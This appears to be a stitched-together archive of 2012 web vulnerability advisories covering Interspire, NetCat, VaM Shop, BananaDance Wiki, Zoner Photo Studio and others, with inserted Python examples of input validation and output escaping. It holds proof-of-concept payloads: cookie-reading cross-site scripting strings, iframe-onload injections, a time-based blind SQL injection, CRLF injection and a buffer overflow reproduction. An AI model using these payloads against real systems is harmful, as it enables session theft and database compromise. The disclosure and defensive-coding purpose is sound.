The attacker can inject malicious code on the server side by adding a contact. The attacker goes to Contacts - add contact and tries to inject malicious code into the email field. An error message pops up that the email is invalid. To bypass this message, the attacker creates a normal user with any email, i.e. t...@test.com. After creating the user, the attacker edits the user and changes the email to the malicious code. The error message does not show up and the code is executed for any user who lists the contacts.
URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Subscribers&Action=View&List=7&id=5019
URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Subscribers&Action=Add

1.2.4
The attacker can inject malicious code on the server side by creating a content block from the Dynamic content tags section. The block name field is vulnerable. Whenever the victim views the blocks the code gets executed.
URL: http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Addons&Addon=dynamiccontenttags&Action=edit

1.2.5
Finally, any of these activities gets logged in the recent activity module, which is shown on every screen of the web app. If the attacker has performed any of the previous persistent malicious actions, the code is executed again in the recent activity module.

1.3
PoC:
http://emailmarketer.127.0.0.1:337/admin/index.php?Page=Addons&Addon=dynamiccontenttags&Action=%3E%22%3Ciframe%20src=http://www.vulnerability-lab.com%20onload=alert%28%22VL%22%29%3C/iframe%3E

Risk:
=====
1.1
The security risk of the remote SQL Injection vulnerability is estimated as critical.

1.2
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

1.3
The security risk of the client side cross site scripting vulnerability is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com]
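Two of the patterns above share one root cause and one fix: the Interspire contact email check runs on the add path but not on the edit path (1.2.3), and the recent activity log re-renders whatever was stored (1.2.5); in the Better WP Security advisory earlier on this page the "is not a valid ip" error box echoes the rejected value back into the page. The added example below (not code from either vendor) shows a single validator shared by every write path, error messages that encode the rejected value before echoing it, and an activity log that is encoded on output and also records rejected writes so an operator can see them. The class and function names (ContactStore, validate_email, validate_ip, try_store, try_validate), the email pattern and the sample values are assumptions constructed for the example.

```python
import html
import ipaddress
import re

# Assumed validator; the email pattern is deliberately simple.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,}")


class ValidationError(ValueError):
    """Carries an HTML-safe message: the rejected value is encoded before it is
    placed in the text, so the error box cannot become an injection point."""


def validate_email(value):
    if EMAIL_RE.fullmatch(value) is None:
        raise ValidationError(f"{html.escape(value, quote=True)} is not a valid email address.")
    return value


def validate_ip(value):
    try:
        ipaddress.ip_address(value)
    except ValueError:
        raise ValidationError(f"{html.escape(value, quote=True)} is not a valid ip.") from None
    return value


class ContactStore:
    """Minimal contact list with a 'recent activity' log rendered on every screen."""

    def __init__(self):
        self.contacts = {}
        self.activity = []
        self._next_id = 1

    def add(self, email):
        validate_email(email)
        cid = self._next_id
        self._next_id += 1
        self.contacts[cid] = email
        self.activity.append(("add", email))
        return cid

    def edit(self, cid, email):
        # Same validator on the edit path: creating a clean record and then
        # editing it no longer bypasses the check.
        validate_email(email)
        self.contacts[cid] = email
        self.activity.append(("edit", email))

    def render_activity(self):
        # Defence in depth: the log is encoded on output even though every stored
        # value passed validation, because rejected attempts are logged as well.
        return "\n".join(f"<li>{action}: {html.escape(value, quote=True)}</li>"
                         for action, value in self.activity)


def try_store(store, action, *args):
    """Run store.add / store.edit; return ('ok', result) or ('error', html_box).
    A rejected write is recorded in the activity log so an operator can see it."""
    try:
        return ("ok", getattr(store, action)(*args))
    except ValidationError as exc:
        store.activity.append(("rejected", args[-1]))
        return ("error", f'<div id="message" class="error"><p>{exc}</p></div>')


def try_validate(validator, value):
    """Return ('ok', value) or ('error', message) for a single validator."""
    try:
        return ("ok", validator(value))
    except ValidationError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    store = ContactStore()
    print(try_store(store, "add", "t@test.com"))            # constructed sample address
    print(try_store(store, "edit", 1, '<iframe src="a">'))  # rejected on the edit path too
    print(try_validate(validate_ip, '"><b>x</b>'))          # message carries the value encoded
    print(store.render_activity())
```

Logging the rejected value is a detection aid as much as a convenience: a burst of rejected writes containing tag characters against the contact or group endpoints is exactly the signal an operator wants surfaced, and it is only safe to surface because the log view encodes on output.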
Endpoint Protector v4.0.4.0 - Multiple Web Vulnerabilities

... EXECUTION!]' =" size="30"> Example: w2003server </div>

Review: List of Computers, Users or Groups in Details Edit Checklist Name

<ul class="sf_admin_checklist">
<li><input name="associated_group[]" id="associated_group_1" value="1" type="checkbox"> <label for="associated_group_1">sali</label></li>
<li><input name="associated_group[]" id="associated_group_2" value="2" type="checkbox"> <label for="associated_group_2">allow</label></li>
<li><input name="associated_group[]" id="associated_group_3" value="3" type="checkbox"> <label for="associated_group_3">IT Support</label></li>
<li><input name="associated_group[]" id="associated_group_4" value="4" type="checkbox"> <label for="associated_group_4">allowvpn</label></li>
<li><input name="associated_group[]" id="associated_group_5" value="5" type="checkbox"> <label for="associated_group_5">Gruppe-No-USB</label></li>
<li><input name="associated_group[]" id="associated_group_6" value="6" type="checkbox"> <label for="associated_group_6"><iframe src="Endpoint%20Protector%204%20-%20Reporting%20and%20Administration%20Tool-5-[PERSISTENT SCRIPT CODE CONTEXT EXECUTION!]' =" label="</li>
</ul>

Risk:
=====
The security risk of the persistent input validation vulnerabilities is estimated as high(-).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
vOlk Botnet Framework v4.0 - Multiple Web Vulnerabilities
For demonstration or reproduce ...

MSN Stealer: The MSN stealer module inside the application displays the bot's name unsanitized. To infect the attacker back, the victim can simulate a fake MSN account login on an infected system with malicious persistent script code as the bot's name. The result is a persistent script code execution out of the bot's name web context in the messenger listing. The victim can hijack the vOlk botnet panel sessions or manipulate the framework with own malicious persistent context to stop, block, take over or disable the service.

Review: MSN STEALER - BOTS NAME

<tbody><tr>
<td width=2%><div align=center><font color=#FF face=Verdana size=1><b>ID</b></font></div></td>
<td width=12%><div align=center><b><font color=#FF face=Verdana size=1>Bot's Name </font></b></div></td>
<td width=6%><div align=center><b><font color=#FF face=Verdana size=1>Pais </font></b></div></td>
<td width=79%><div align=center><b><font color=#FF face=Verdana size=1>Login de msnmsgr.exe </font></b></div></td>
</tr>
<tr>
<td><div align=center><font color=#CC>1</font></div><font color=#CC></font></td>
<td><div align=center><font color=#CC>[[PERSISTENT INJECTED SCRIPT CODE!]]</font></div><font color=#CC></font></td>

Review: Visit Webpage - Open URL

<table style="border-style:solid; border-width:1px;" background=archivos/imagen/fondo.png height=69 width=96%>
<tbody><tr>
<td align=left bgcolor=#33 height=26 width=29%><font color=#FF face=Verdana size=1>Open URL Bots: </font></td>
<td align=left bgcolor=#33 width=68%><div><span style="margin-left:0px" name=div_1_mensaje id=div_1_mensaje><font face=Verdana size=1>
<input name=domin id=domin style="border:1px solid #FF; width: 420; color:#66; font-family: Verdana; font-size:8pt; background-color:#00; float:left; height:17" value=[[PERSISTENT INJECTED SCRIPT CODE!]];) = size=1>
</font></span></div></td>
</tr>

Review: Download File

<table style="border-style:solid; border-width:1px;" background=archivos/imagen/fondo.png height=83 width=99%>
<tbody><tr>
<td align=left bgcolor=#33 height=19 width=29%><font color=#FF face=Verdana size=1>Download url:</font></td>
<td align=left bgcolor=#33 height=19 width=68%><div><font face=Verdana size=1>
<input name=https id=https style="border:1px solid #FF; width: 394; font-family:Verdana; font-size:8pt; color:#66; background-color:#00; float:left; height:17" value=http://www.;[[PERSISTENT INJECTED SCRIPT CODE!]];) .com= size=1>
</font></div></td>
</tr>

Review: Settings - Administrator Username & Administrator Password

<tbody><tr>
<td align=left bgcolor=#33 height=21 width=30%><font color=#FF face=Verdana size=1>User Administrator :</font></td>
<td align=left bgcolor=#33 width=70%><div><span style="margin-left:0px" name=div_1_mensaje id=div_1_mensaje><font face=Verdana size=1>
<input style="border:1px solid #FF; width: 300px; font-family:Verdana; font-size:8pt; color:#66; background-color:#00" value=[[PERSISTENT INJECTED SCRIPT CODE!]] disabled=disabled name=User id=User size=1 type=text>[[PERSISTENT INJECTED SCRIPT CODE!]]
</font></span></div></td>
</tr>
<tr>
<td align=left bgcolor=#33 height=21 width=30%><font color=#FF face=Verdana size=1>Password Administrator :</font></td>
<td align=left bgcolor=#33 width=70%><span style="margin-left:0px" name=div_segundos id=div_segundos><font face=Verdana size=1>
<input name=Pasw id=Pasw style="border:1px solid #FF; width: 300px; font-family:Verdana; font-size:8pt; color:#66; background-color:#00" value=\ type=text>[[PERSISTENT INJECTED SCRIPT CODE!]];) = size=70
</font></span></td>
</tr>

Risk:
=====
1.1 The security risk of the SQL injection vulnerabilities is estimated as critical.
1.2 The security risk of the persistent script code injection vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Karim H.B. (k...@vulnerability-lab.com)
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
CMSQLITE v1.3.2 - Multiple Web Vulnerabiltiies
...:8080/cmsqlite/admin/helper/deleteMenu.php
http://cmsqlite.127.0.0.1:8080/cmsqlite/admin/helper/deleteArticle.php
http://cmsqlite.127.0.0.1:8080/cmsqlite/admin/helper/deleteCategory.php

Risk:
=====
1.1 The security risk of the local file include vulnerability is estimated as high(-).
1.2 The security risk of the client side cross site scripting vulnerability is estimated as medium(-).
1.3 The security risk of the client side cross site request forgery vulnerabilities is estimated as low(+).

Credits:
========
Katharina S.L. (ka...@vulnerability-lab.com)

Copyright © 2012 | Vulnerability Laboratory
NetCat CMS v5.0.1 - Multiple Web Vulnerabilities
Title:
======
NetCat CMS v5.0.1 - Multiple Web Vulnerabilities

Date:
=====
2012-10-31

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=738

VL-ID:
======
738

Common Vulnerability Scoring System:
====================================
2.5

Introduction:
=============
Vendor Website: http://netcat.ru (RU)

Abstract:
=========
The Security Effect Research Team discovered multiple web vulnerabilities in the Russian Bce NetCat v5.0.1 content management system.

Report-Timeline:
================
2012-10-31: Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
Multiple client side cross site scripting and HTTP parameter pollution vulnerabilities are detected in the Russian Bce NetCat v5.0.1 content management system. The non-persistent cross site scripting vulnerabilities allow remote attackers to form malicious client side web requests to steal CMS customer session information. The client side CRLF vulnerability allows remote attackers to change the GET and POST request with own values to manipulate the HTTP protocol request.

The first client side cross site scripting vulnerability is located in the search module with the bound vulnerable search_query application parameter. The second HTTP parameter pollution vulnerability is located in the post.php file when processing the request via the bound vulnerable redirect_url parameter.

Successful exploitation of the vulnerabilities can result in client side HTTP parameter manipulation via POST/GET, client side phishing, client side cookie stealing via cross site scripting and client side CMS web context manipulation.

Vulnerable Module(s):
[+] search
[+] post

Vulnerable Parameter(s):
[+] search_query
[+] redirect_url

Proof of Concept:
=================
1. Client Side - Cross Site Scripting

The client side cross site scripting vulnerabilities can be exploited by remote attackers without a privileged application user account and with medium or high required user interaction. For demonstration or reproduce ...

1.1 - In URL address.
PoC: http://site.127.0.0.1:3666/?' onmouseover='prompt(document.cookie)'bad='

1.2 - In "search_query" parameter.
PoC: http://site.127.0.0.1:3666/search/?search_query=' onmouseover=prompt(document.cookie) bad='

2. Client Side via POST - CRLF injection/HTTP Parameter Pollution

The client side CRLF vulnerability can be exploited by remote attackers without a privileged application user account and with medium or high required user interaction. For demonstration or reproduce ...

In /netcat/modules/netshop/post.php the URL-encoded POST input redirect_url was set to NetCatStatus:hacked_by_seceffect

PoC: POST http://site.127.0.0.1:3666/netcat/modules/netshop/post.php
cart%5b353%5d%5b10%5d=1&cart_mode=add&redirect_url=%0d%0a%20NetCatStatus:hacked_by_seceffect

Risk:
=====
1.1 The security risk of the client side cross site scripting vulnerabilities is estimated as low(+)|(-)medium.
1.2 The security risk of the HTTP parameter pollution vulnerability is estimated as medium(-).

Credits:
========
SECURITY EFFECT [Research Team] - (http://seceffect.tumblr.com/)
VaM Shop v1.69 - Multiple Web Vulnerabilities
Title:
======
VaM Shop v1.69 - Multiple Web Vulnerabilities

Date:
=====
2012-10-24

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=730

VL-ID:
======
730

Common Vulnerability Scoring System:
====================================
8.1

Introduction:
=============
(Vendor Website: http://vamshop.ru/ )

Abstract:
=========
The Security Effect Research Team discovered multiple web vulnerabilities in the VaM Shop v1.69 web application CMS.

Report-Timeline:
================
2012-10-24: Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
1.1 A laboratory researcher discovered a critical SQL injection vulnerability in the VaM Shop v1.69 web application content management system. The SQL vulnerability allows remote attackers to inject/execute own SQL commands/statements on the affected VaM Shop v1.69 web application DBMS. The vulnerability is located in the shopping_cart.php file with the bound vulnerable products_id parameter request. The vulnerability can be exploited by remote attackers without required user interaction. Successful exploitation of the vulnerability results in web application DBMS and service compromise or stable application manipulation via SQL injection.

Vulnerable File(s):
[+] shopping_cart.php

Vulnerable Parameter(s):
[+] products_id

1.2 A laboratory researcher discovered a client side cross site scripting vulnerability in the VaM Shop v1.69 web application content management system. The vulnerability is located in the advanced_search_result.php file when processing to load script code out of the search results web context. Successful exploitation results in session hijacking, non-persistent account phishing or client side content manipulation.

Vulnerable File(s):
[+] advanced_search_result.php

Proof of Concept:
=================
1. Blind SQL injection in shopping_cart.php in parameter product_id[].

The SQL injection vulnerability can be exploited by remote attackers without a privileged application user account. For demonstration or reproduce ...

PoC: POST - SQL INJECTION
/shopping_cart.php?action=update_product
cart_delete[]=2071&cart_quantity[]=1&old_qty[]=1&products_id[]=2071'[SQL INJECTION VULNERABILITY] and sleep(37)%3d%27

2. Multiple Cross Site Scripting

The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required user interaction. For demonstration or reproduce ...

PoC:
/advanced_search_result.php/o onmouseover=prompt(document.cookie) //
/shopping_cart.php?action=update_product&cart_delete[]=o onmouseover=prompt(document.cookie) //

Risk:
=====
1. The security risk of the blind SQL injection vulnerability is estimated as high(+).
2. The security risk of the client side cross site scripting vulnerability is estimated as low(+).

Credits:
========
SECURITY EFFECT [Research Team] - (http://seceffect.tumblr.com/)
BananaDance Wiki b2.2 - Multiple Web Vulnerabilities
Title:
======
BananaDance Wiki b2.2 - Multiple Web Vulnerabilities

Date:
=====
2012-11-10

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=745

VL-ID:
======
745

Common Vulnerability Scoring System:
====================================
7.1

Introduction:
=============
Banana Dance is an open-source PHP/MySQL-based program. It is designed to combine the simplicity of wiki-publishing software with the versatility of a CMS. The program also promotes community-building through organized and user-rated commenting features. Highly flexible with theme-integration and extension availability, Banana Dance can be used for all types of purposes, whether it be to create an entire website, a product owner's manual, or an "article"-posting site.

(Copy of the Vendor Homepage: http://www.bananadance.org )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official BananaDance Wiki b2.2 CMS.

Report-Timeline:
================
2012-11-10: Public or Non-Public Disclosure

Status:
=======
Published

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
1.1 A SQL injection vulnerability is detected in the BananaDance Wiki b2.2 content management system. The vulnerability allows an attacker (remote) or a local privileged moderator/admin user account to execute own SQL commands on the affected application DBMS. The SQL injection vulnerability is located in the user management module with the bound vulnerable alpha listing parameter. Successful exploitation of the vulnerability results in DBMS application compromise. Exploitation requires no user interaction but a privileged user account.

Vulnerable Module(s):
[+] User Management

Vulnerable Parameter(s):
[+] alpha

1.2 Multiple persistent input validation vulnerabilities are detected in the BananaDance Wiki b2.2 content management system. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent) of the vulnerable module. The persistent vulnerabilities are located in the user, banned user and badge module listings with the bound vulnerable username and email parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user interaction (view listing) and a registered low privileged web application user account.

Vulnerable Module(s):
[+] Add User - Listing
[+] Banned User - Listing
[+] Badges - Listing

Vulnerable Parameter(s):
[+] Username
[+] Email (Profile)

Proof of Concept:
=================
1.1 The SQL injection vulnerability can be exploited by local privileged user accounts and moderators. For demonstration or reproduce ...

PoC:
<html>
<head><title>BananaDance Wiki b2.2 - SQL Vulnerability</title></head>
<body>
<iframe src="http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users&alpha=A'-1 [SQL-INJECTION!]--" width=1000 height=800></iframe>
<iframe src="http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users&alpha=M'-1 [SQL-INJECTION!]--" width=1000 height=800></iframe>
<iframe src="http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users&alpha=K'-1 [SQL-INJECTION!]--" width=1000 height=800></iframe>
</body>
</html>

1.2 The persistent input validation vulnerabilities can be exploited by remote attackers with a low privileged application user account and low required user interaction. For demonstration or reproduce ...

Review: Add (Existing) User - Listing

<tr id=19>
<td valign=top><center><img src=imgs/status-on.png id=status19 alt=Active title=Active border=0 height=16 width=16></center></td>
<td valign=top><a href=index.php?l=users_edit&id=19>[PERSISTENT EXECUTION OF INJECTED SCRIPT CODE!];) = a=</a></td>
<td valign=top>2012-06-20</td>
<td valign=top><span style="">ESTANDAR</span></td>
<td valign=top>0</td>
<td valign=top>0</td>
<td valign=top>0</td>
<td valign=top><a href=# onClick="deleteID('bd_users','19');return false;"><img src=imgs/icon-delete.png border=0 alt=Delete title=Delete /></a></td>
</tr>

URL(s):
http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users
http://bananadance-wiki.127.0.0.1:1339/admin/index.php?l=users_add

Risk:
=====
1.1 The security risk of the local SQL injection vulnerability is estimated as medium(+) because of the required moderator account.
1.2 The security risk of the persistent input validation vulnerabilities is estimated as high.

Credits:
========
Vulnerability Laboratory [Research Team] - Kathrin SL (ka...@vulnerability-lab.com)
Eventy CMS v1.8 Plus - Multiple Web Vulnerablities
... as critical.
1.2 The security risk of the persistent input validation vulnerability is estimated as medium(+).
1.3 The security risk of the client side cross site scripting vulnerability is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com]
Zoner Photo Studio v15 b3 - Buffer Overflow Vulnerabilities
... category="no" name="PenTest40" />
</keyword>
<keyword category="yes" name="[BUFFER OVERFLOW (EIP & EBX) VIA IMPORT KEYWORDS!]">
<keyword category="yes" name="31337;" />
<keyword category="no" name="Ibrahim El-Sayed" />
<keyword category="no" name="PenTest41" />
<keyword category="no" name="PenTest42" />
<keyword category="no" name="PenTest43" />
<keyword category="no" name="PenTest44" />
<keyword category="no" name="PenTest45" />
<keyword category="no" name="PenTest46" />
<keyword category="no" name="PenTest47" />
<keyword category="no" name="PenTest48" />
<keyword category="no" name="PenTest49" />
</keyword>
</hierarchy>
</keywords>'; ?>

--- Debug Logs ---
(3a98.1840): Access violation - code c0000005
eax= ebx=00410041 ecx=31e7 edx=0878dd68 esi=0021ced0 edi=
eip=41414141 esp=0021ce68 ebp=0021cebc iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=0246
ntdll!ZwRaiseException+0x12:
76fd15de 83c404 add esp,4
0:000> u
ntdll!ZwRaiseException+0x12:
76fd15de 83c404 add esp,4
76fd15e1 c20c00 ret 0Ch
ntdll!NtRaiseHardError:
76fd15e4 b83001 mov eax,130h
76fd15e9 33c9 xor ecx,ecx
76fd15eb 8d542404 lea edx,[esp+4]
76fd15ef 64ff15c000 call dword ptr fs:[0C0h]
76fd15f6 83c404 add esp,4
76fd15f9 c21800 ret 18h
0:000> a 76fd15de
!exchain

1.2 The buffer overflow vulnerability can be exploited by local attackers with a low privileged system user account and without required user interaction. For demonstration or reproduce ...

Manual Exploitation/Reproduce: Publizieren > Per Mail versenden > Zip Comprimierung der Bilder > Archivname + FILE.[ZIP] (STRG+UMS+M)

1. Install and start the Zoner Photo Studio software.
2. Click the Publizieren button in the main menu and open the Per Mail versenden function (STRG+UMS+M).
3. Activate the zip-compressed pictures function (Zip Comprimierung der Bilder).
4. Now you see the standard value (Dateien.zip).
5. Delete one of the two words, but do not delete the `.`, because it is required for a valid submission (via the OK button).
6. Include one of the following example strings, Daten.[+Large String AA+] or [Large String AA+].zip, and click OK!
7. *BAM!* The result is a stack-based buffer overflow [overwrites ebx and eip].

--- Exception Logs ---
EventType=BEX [Buffer Overflow]
EventTime=129972361437653387
ReportType=2
Consent=1
ReportIdentifier=cfbd2b2a-2d1f-11e2-be0d-8c500fdd2fd9
IntegratorReportIdentifier=cfbd2b29-2d1f-11e2-be0d-8c500fdd2fd9
WOW64=1
Response.type=4
Sig[0].Name=Anwendungsname
Sig[0].Value=Zps.exe
Sig[1].Name=Anwendungsversion
Sig[1].Value=14.0.1.7
Sig[2].Name=Anwendungszeitstempel
Sig[2].Value=4fffeaeb
Sig[3].Name=Fehlermodulname
Sig[3].Value=StackHash_24fa
Sig[4].Name=Fehlermodulversion
Sig[4].Value=0.0.0.0
Sig[5].Name=Fehlermodulzeitstempel
Sig[5].Value=
Sig[6].Name=Ausnahmeoffset
Sig[6].Value=41414141   <=== EIP
Sig[7].Name=Ausnahmecode
Sig[7].Value=c0000005
Sig[8].Name=Ausnahmedaten
Sig[8].Value=0008

--- Debug Logs ---
- Access violation - code c0000005
ebx=00410041
eip=41414141

Risk:
=====
The security risk of the local buffer overflow vulnerabilities is estimated as medium(+)|(-)high.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com)
iDev Rentals v1.0 - Multiple Web Vulnerabilities
... will be executed.

URL: http://idevnetwork.127.0.0.1:1336/[PATH]/idev-rentals/admin/index.php?page=categories

1.3 The remote attacker can add packages to inject own malicious persistent script code, <iframe src=http://www.vulnerability-lab.com onload=alert(VL)></iframe>, in the fields package name or package description. When a user is processing to view the packages listing, the malicious script code will be executed.

URL: http://idevnetwork.127.0.0.1:1336/[PATH]/idev-rentals/admin/index.php?page=add_package

Risk:
=====
1.1 The security risk of the persistent input validation vulnerabilities is estimated as medium(+).

Credits:
========
Vulnerability Laboratory - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com]
Akeni LAN v1.2.118 - Filter Bypass Vulnerability (Local)
Title: == Akeni LAN v1.2.118 - Filter Bypass Vulnerability Date: = 2012-11-14 References: === http://www.vulnerability-lab.com/get_content.php?id=761 VL-ID: = 761 Common Vulnerability Scoring System: 3.3 Introduction: = Akeni LAN Messenger is an IM system designed for your LAN. It is easy to setup and does not requires a dedicated server or Internet connection. The rich client support chat, notification, conferencing, and file transfer. For those who also need authentication and encryption, please take a look at our Expert and Pro products. If your organization needs a web based solution that requires no client side installation of software, please take a look at our Web Chat. Due to the peer-to-peer nature of the product, there is no single point of failure and there is no need for any network setup. This make Akeni LAN Messenger a good solution for dynamic environment where two people can communicate with one another as long as the network itself is up and running. For example, LAN Messenger can be used by IT support personnel who needs a way to communicate and send files with each other anywhere in their network easily, without the need to connect to the Internet or to a centralized server. (Copy of the Vendor Website: http://www.akeni.com/en/product/lanmessenger.php ) Abstract: = The Vulnerability Laboratory Research Team discovered a filter bypass software vulnerability in the official Akeni LAN (LE) Messenger v1.2.118. Report-Timeline: 2012-11-14: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Local Severity: = Medium Details: A filter bypass software vulnerability is the detected in the official Akeni LAN (LE) Messenger v1.2.118. The bug allows local attackers to inject own malicious persistent script codes on application-side. The vulnerability is located in the Akeni `incorrect length` exception-handling module with the bound vulnerable groupname (Gruppenname) parameter. 
The filter of the Akeni LAN Messenger santizes malicious tags and evil frame context but does not recognize a secound splitted (%20) request after the first. The attacker can provoke a first parse by injecting for example a `` to match the invalid exception criterias. After the provoke he splits the request with %20 and inject his own tags directly after it. The result is a persistent script code execution out of the invalid length invalid parameter software exception-handling. Vulnerable Module(s): [+] Menu Action Contact List Add Group Vulnerable Parameter(s): [+] Incorrect Length - Exception-Handling [+] Invalid Context - Exception-Handling Proof of Concept: = The vulnerability can be exploited by local attackers without required user inter action. For demonstration or reproduce ... 1. Let us watch the exception-handling of the invalid length. First we inject a standard iframe like iframe src=a ['] has incorrect length. Groups name must have between %2 and %3 characters. ... the validation of the incorrect length or invalid parameter redisplays the message but parse the iframe tag. We can see in the parse the which is splitted from the parse itself and shows is there could be an injection possibility. 1.2 The next step will be to split the request. HOW?! We inject a standard iframe (iframe src=a) split the request with %20 (Space) and inject the secound script code after the split. PoC: String: iframe src=a%20img src=http://www.vulnerability-lab.com/gfx/logo-header.png --- Exception Logs (Bypass) --- [] has incorrect length. Groups name must have between 30 and %3 characters. Risk: = The security risk of the local persistent software vulnerability is estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. 
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com
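The Akeni failure pattern above, a blocklist filter that removes the tag it recognises and then re-displays the remainder of the input inside its own error message, is reproduced below beside the hardened handling a defender would want: validate against an allowlist first, and if the value is rejected, HTML-escape it before it is echoed. This is an added Python illustration, not Akeni's code; the 2..30 length bounds are an assumption (the advisory's messages show only the placeholders %2 / %3 and one literal 30), the allowlist rule and the sample string are constructed, and `naive_filter` only models the behaviour the advisory describes.

```python
import html
import re
from urllib.parse import unquote

# Group-name length bounds. The advisory's messages only show placeholders
# (%2 / %3) and one literal 30, so 2..30 is an assumed configuration.
MIN_LEN, MAX_LEN = 2, 30

# Allowlist for a group name: letters, digits, space and a little
# punctuation. Constructed rule, not Akeni's.
GROUP_NAME_RE = re.compile(r"[A-Za-z0-9 _.\-]+")

# --- Vulnerable pattern --------------------------------------------------
# A blocklist filter that recognises one leading tag, removes it and then
# trusts the remainder, modelled on the behaviour the advisory describes.
_LEADING_TAG = re.compile(r"^<[^>]*>")


def naive_filter(value: str) -> str:
    return _LEADING_TAG.sub("", value, count=1)


def naive_length_error(raw_name: str) -> str:
    """Re-displays the (filtered) input inside the error text without escaping."""
    cleaned = naive_filter(unquote(raw_name))
    return (f"[{cleaned}] has incorrect length. Groups name must have between "
            f"{MIN_LEN} and {MAX_LEN} characters.")


# --- Hardened pattern ----------------------------------------------------
def validate_group_name(raw_name: str) -> tuple[bool, str]:
    """Decode once, validate against an allowlist, and if the value is
    rejected build the error message with the input HTML-escaped for both
    body and attribute context. Returns (accepted, error_html)."""
    value = unquote(raw_name)
    if MIN_LEN <= len(value) <= MAX_LEN and GROUP_NAME_RE.fullmatch(value):
        return True, ""
    safe = html.escape(value, quote=True)
    return False, (f"[{safe}] is not a valid group name. Group names must have "
                   f"between {MIN_LEN} and {MAX_LEN} characters.")


def contains_markup(s: str) -> bool:
    """Check helper: does the rendered message still carry a raw tag?"""
    return re.search(r"<[a-zA-Z]", s) is not None


# Constructed sample in the shape of the advisory's PoC string: a first tag
# that the blocklist catches, a %20 split, then a second tag it never sees.
SAMPLE = "<iframe src=a>%20<img src=http://example.invalid/logo.png>"

if __name__ == "__main__":
    print("naive   :", naive_length_error(SAMPLE))
    print("hardened:", validate_group_name(SAMPLE)[1])
```

The point of the comparison is ordering: the naive path sanitizes and then trusts, so anything the blocklist does not recognise reaches the page verbatim; the hardened path never tries to clean the value at all, it either accepts an allowlisted value or escapes the rejected one for the context it is rendered into.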
Manage Engine Exchange Reporter v4.1 - Multiple Web Vulnerabilities
=alert(VL)/

When the user browses the alarms page in the control panel the persistent injected script code will be executed out of the web application context.

1.2 PoC:
http://exchangereporterplus.127.0.0.1:8080/exchange/ReportsIndex.do?selectedTab=reportsreportCategoryID=3+iframe src=http://www.vuln-lab.com onload=alert(VL)/iframe

The attacker can go to reports and insert their own malicious script code inside of the search report box to exploit the service application.

Risk:
=====
1.1
The security risk of the persistent input validation vulnerability is estimated as medium(+).

1.2
The security risk of the client side cross site vulnerabilities is estimated as low(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [st...@vulnerability-lab.com] [iel-sayed.blogspot.com]
SonicWALL CDP 5040 v6.x - Multiple Web Vulnerabilities
Title:
======
SonicWALL CDP 5040 v6.x - Multiple Web Vulnerabilities

Date:
=====
2012-11-19

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=549

VL-ID:
=====
549

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
Tapeless Enterprise-Level Data Backup and Protection, Without the Price Tag. Automatic, real-time data backup for servers, laptops and PCs. Features include file versioning, fast data recovery, and automatic offsite backup capabilities to protect businesses against disasters. SonicWALL® Continuous Data Protection (CDP) v6 is a next-generation data backup and disaster recovery solution that automatically preserves and protects business-relevant data assets against loss from file, device, and location based disasters. With support for Windows®, Linux® and Mac OS® through a single Web GUI, CDP provides granular, globally enforced policy controls over the entire backup operation. Unmatched flexibility enables IT administrators to dictate what information to backup, what to exclude and how the information should be maintained to adhere to recovery and compliance requirements. A sophisticated new fileset backup methodology combined with agent-based data de-duplication moves and stores only unique data blocks. This speeds the backup process and optimizes bandwidth usage while maintaining total information continuity and the ability to flexibly restore multiple revisions. SonicWALL Continuous Data Protection v6 offers the comprehensive data protection organizations demand and the power administrators need for vigilant data backup and disaster recovery.

(Copy of the Vendor Homepage: http://sonicwall.com/emea/backup_and_recovery.html)

Abstract:
=========
